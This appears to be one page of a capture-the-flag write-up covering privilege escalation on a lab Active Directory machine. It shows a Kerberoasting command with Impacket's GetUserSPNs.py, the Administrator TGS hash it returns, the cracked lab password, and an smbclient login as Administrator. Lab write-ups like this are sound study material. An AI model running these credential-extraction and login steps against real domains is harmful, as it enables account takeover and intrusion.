PrivEsc

Kerberoasting

With our new found credentials we can use GetSPN to find kerberoastable accounts:

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS

GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 14:06:40.351723  2025-01-28 13:22:38.706967             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$00397987408f0444b049f7ef1fb744ef$44eaa9e34ea27f79672ba26a96e3af3b00f3f380d797aa863d01772d168e980dd26e34d6e5590bf14113037f27151a837643d138c941f4dacdbd703b1308b5bbe70c81f403ea1233375e6883cc689db59029c430fb34d5c17cc2ec01a1c5709a09efc29bf1575906178f5775204a67c98e04d5ead0dcfa37cd0c9555b4d3ec0ef24b6c9330601b44dd825a348ea02cd040739eb8f31260959137269eb5952266e9273e1c941a6dbc746fdcea1517bc53bc5ca47e865044fae46e72c4e955a06f232e8261cbe29586dc8f0c1d26a1661bdf17ac80616cf9e5590ad30895af69850210d3fcac28e8f46d8ec1daafcb33bc80725a9a9dc6365d735572cd02445f3a70f4b6d8cdef6ea4a11ce3e0f3a2d8d93f82894d8fff8c0f52c67b0e455d18531d4da15fb37269acb31c794e9d1264fd8b35808357076a0de0c2ed79cc2b30b2516a8477381cbcbe6d0db142b77a923b951b9999b85bc2e19fa46395cdb82c59d16b9e447243902f19e5a7161785db8773a31111bb6fd80551fbbc612028fefc8f5bdd41a6847159cd595f1a214d4919f1745add361f4dd52e0d50146eaddea5491ab6df987dbf56c22780a560576d2bf41d8abc31052a68b9361f8915dccda779a367efd2f541512409c517d2fa3b9e987b37f0c97a91b2a9735088d49d23b243b28d6e532f8863413431976fba383953077eb5864efe33533d9aac44b669782a57b63a60441df449bdc8d097926922b2b30e0c0e7b3a19f8ed371a1215ba10839ebb19a0486246984c1a0240a4a7c778a739fc548d86c3cc3a3bbe00b2ca1ea850353fa6d720a78b9a14da5e78400dde0d929fe1803290c161bbffdc02e1cc9b825f1034d526f633cdeabacc751f8bcc19fa7cd85b2d025c9437642a84fb20250d6ac5ef8dc76601307626109b7f2fa425642bee8390752505427fa8581b13fdcdf0c0655225f548cbff277f1ad725b44ceaff9cb139b32104427d78d330c3fbb77a757f8485c6b3d174ecd2ea01227e0d6a1edda17d527f0f79cde2a00ec7a1591f0f962b992f0b87841fce9aa5334660d5a914448fdbc49a8253b7a621febc4fec5bc11d9126eea2732f92700ac5755432341838bed47155fc6259e38b1a409f86dccbcd96f1ae8fefb70b992dfa737859f126d90982f63c5c05a914d40e4035629b7e195347f173f3eb0687d01e69a8dbcb419c9ee4ae5b06d09e3d0d0721c691726fb54ff3298ba9d67c1cef821a5ed2b9805b98ecf3fa

We get a new pair of credentials: Administrator:Ticketmaster1968

Now we get the root flag:

smbclient //10.10.10.100/Users -U active.htb\\Administrator%Ticketmaster1968

PreviousFoothold NextRemote

Last updated 10 months ago